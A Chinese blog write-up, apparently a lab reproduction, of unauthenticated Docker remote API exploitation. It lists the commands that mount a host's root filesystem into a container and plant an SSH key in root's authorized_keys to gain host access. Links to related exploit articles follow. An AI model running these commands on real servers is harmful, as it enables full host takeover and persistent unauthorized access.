漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接

最新推荐文章于 2024-03-19 20:28:08 发布
最新推荐文章于 2024-03-19 20:28:08 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: docker ssh 容器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45234543/article/details/127998966
版权

perface

一般开放在2375端口
docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展

写入ssh密钥连接在这里插入图片描述

首先发现docker认证漏洞
可以直接执行命令
···
docker -H tcp://47.92.147.38:2375 images
docker -H tcp://47.92.147.38:2375 run -it -v /:/mnt ad080923604a /bin/bash
···
上面两行命令,第一行是为了看现在docker存在的镜像
第二行,则是根据现在有的镜像启动容器,并将容器卷挂载在根目录下
然后反弹shell,即可以直接进入容器的/bin/bash下
在这里插入图片描述而获取到了容器的操作权限,下一步则是获取宿主机的权限,这里我们使用写入ssh,直接进行认证连接

进入vps,生成密钥

ssh-keygen -t rsa # 之后一直回车
cd .ssh
cat 13_rsa.pub #默认名为authorized_keys.pub,我取名为13

将密钥内容写入/mnt/root/.ssh/authorized_keys下
在这里插入图片描述

echo xxxxxx > autuorized_keys

在这里插入图片描述成功连入

雲深拾月
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
h5sconsole:H5S视频平台管理Web界面
05-24
h5sconsole-h5stream的管理Web界面 构建设置 # install dependencies npm install # serve with hot reload at localhost:6080 npm run dev # build for production with minification npm run build
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。
docker api未授权导致rce 漏洞修复
core815的专栏
05-26 1331
docker api未授权导致rce 漏洞修复
漏洞发现-漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取
最新发布
siu~
03-19 774
1、Nuclei-Poc开发-环境配置&编写流程 2、Nuclei-Poc开发-Yaml语法&匹配提取 3、Nuclei-Poc开发-BurpSuite一键生成插件 章节点: 漏洞发现-Web&框架组件&中间件&APP&小程序&系统 扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫 Poc开发-Ymal语法&联动导入&项目拓展 扫描插件-Burpsuite插件&浏览器插件&自动模版
记一次内网靶机实战
千寻的博客
11-05 1856
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 5770
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
poc-swagger:[POC]昂首阔步
05-09
poc-swagger 这是一个Java 8项目。 运行:mvn spring-boot:run 访问Swagger-UI界面:
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 856
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 未授权通过外网...
vluhub之docker-unauthoriun-rce复现
weixin_45006525的博客
08-07 1403
1.漏洞简介: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。 2.漏洞复现 环境介绍: 1.攻击机kali:192.168.231.128 2.靶机ubuntu:192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址:https://vulhub.org github下载:https://github.com/vulhub/vulh
渗透技巧基于Swagger-UI的XSS
网安君的博客
08-25 7860
swagger-ui是一个允许 API 交互和可视化的库,Swagger-UI有一个特性它允许您向 API 规范提供URL一个yaml或json文件,它将被获取并显示给用户。该漏洞产生的原因是swagger-ui使用了一个过时的库DomPurify(DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全的HTML。),结合库的特性允许获得由查询参数控制的DOM型XSS。
SwaggerUI用法和权限的注解
LXC的博客
10-26 1204
1.为什么使用swagger 2.怎么使用swagger 3.权限注解的使用方式
Elasticsearch_poc
05-18
自述文件 运行POC java -jar target / elasticsearch-0.0.1-SNAPSHOT.jar服务器dropwizard.yml java -Xdebug -Xrunjdwp:transport = dt_socket,server = y,suspend = n,address = 5005 -jar target // elasticsearch-0.0.1-SNAPSHOT.jar服务器dropwizard.yml 去做 创建前端以创建产品创建前端以搜索产品创建前端以在键入产品时进行搜索创建前端以进行建议 确定创建后端以搜索产品确定创建后端以在键入产品时进行搜索创建后端以提出建议
swagger-ui-master.zip
05-11
swagger-ui:一个无依赖的HTML、JS和CSS集合,可以为Swagger兼容API动态生成优雅文档。也可去官网下载(https://swagger.io/tools/swagger-ui/)
19 - vulhub - docker daemon api 未授权访问漏洞
利他者利己,利己者无功。利他利己,利己利他。
11-15 1519
Docker是一款国内外云平台常用的应用程序轻量级容器,AWS,百度等都有使用。通常用于轻量化部署应用。 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
[docker]unauthorized authentication required
m0_67391870的博客
04-11 2998
检查登录状态 docker logout [addr] docker login [addr] 我日常用私有库,所以在login/logout时要加仓库地址,login时要输入账号密码。 测试docker pull有没有问题,pull如果没问题说明认证已经通过。 如果push还是报这个错误,基本确定是超时,docker push连接默认5分钟,超过时间也报unauthorized的错误。 ...
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值